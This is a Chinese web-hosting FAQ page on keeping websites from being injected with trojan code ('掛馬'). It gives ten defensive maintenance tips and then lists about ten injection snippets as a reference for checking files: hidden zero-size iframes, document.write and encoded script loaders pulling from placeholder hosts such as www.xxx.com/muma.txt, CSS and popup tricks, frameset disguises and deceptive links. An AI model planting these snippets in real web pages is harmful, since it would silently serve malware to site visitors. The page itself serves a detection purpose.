[原創(chuàng)]怎樣讓網(wǎng)站避免被掛馬- IDC資訊,虛擬主機(jī)域名注冊(cè)-常見問題,虛擬主機(jī),網(wǎng)頁制作,域名注冊(cè),主機(jī),企業(yè)郵局,主頁空間,個(gè)人主頁,網(wǎng)絡(luò)實(shí)名,主機(jī)托管,網(wǎng)站建設(shè),域名">
歡迎您來到禾城數(shù)碼,開始互聯(lián)網(wǎng)之旅!
[原創(chuàng)]怎樣讓網(wǎng)站避免被掛馬
1、建議通過FTP來上傳和維護(hù)網(wǎng)頁,盡量不安裝ASP的上傳程序。 2、對(duì)ASP上傳程序的調(diào)用一定要進(jìn)行身份認(rèn)證,并設(shè)置只允許信任的人使用上傳程序。 3、ASP程序管理員的用戶名和密碼不能是弱密碼并且要定期更換。 4、到正規(guī)網(wǎng)站下載ASP程序,下載后修改數(shù)據(jù)庫名稱和存放路徑,數(shù)據(jù)庫的文件名稱也要相對(duì)難些。 5、盡量保持程序是最新版本。 6、網(wǎng)頁不加注后臺(tái)管理程序登陸頁面鏈接。 7、維護(hù)后刪除后臺(tái)管理程序的登陸頁面,下次維護(hù)時(shí)再通過FTP上傳。 8、要定期備份數(shù)據(jù)庫等重要文件。 9、平時(shí)要多維護(hù)并注意空間中是否有來歷不明的ASP文件。 10、發(fā)現(xiàn)被入侵時(shí),除非能識(shí)別出所有木馬文件,不然最好刪除所有文件。 重新上傳文件前,所有ASP程序用戶名和密碼都要重置,并且重新修改程序數(shù)據(jù)庫名稱和存放路徑以及后臺(tái)管理程序的路徑。 做好防范措施網(wǎng)站就會(huì)相對(duì)比較安全,但也不能疏忽大意,因?yàn)槿肭峙c反入侵是一場持久戰(zhàn)。 掛馬代碼大全(檢查文件是否被掛馬時(shí)可參考) 一、框架掛馬 <iframe src=地址 width=0 height=0></iframe> 二、JS文件掛馬 首先將以下代碼 document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”); 保存為xxx.js, 則JS掛馬代碼為 <script language=javascript src=xxx.js></script> 三、JS變形加密 <script language=”Jscript.Encode” src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后綴 四、Body掛馬 <body ></body> 五、隱蔽掛馬 top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’; 六、CSS掛馬 body { background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)} 七、JAJA掛馬 <script language=javascript> window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″); </script> 八、圖片偽裝 <html> <iframe src=”網(wǎng)馬地址” height=0 width=0></iframe> <img src=”圖片地址”></center> </html> 九、偽裝調(diào)用: <frameset rows=”444,0″ cols=”*”> <frame src=”打開網(wǎng)頁” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″> <frame src=”網(wǎng)馬地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″> </frameset> 十、高級(jí)欺騙 <a href=”http://www.163.com(迷惑連接地址,顯示這個(gè)地址指向木馬地址)” > 頁面要顯示的內(nèi)容 </a> <script Language=”Javascript”> function www_163_com () { var url=”網(wǎng)馬地址”; open(url,”NewWindow”,”toolbar=no,location=no,directories=no, status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″); } </script>
|
|||
>> 相關(guān)文章 | |||
|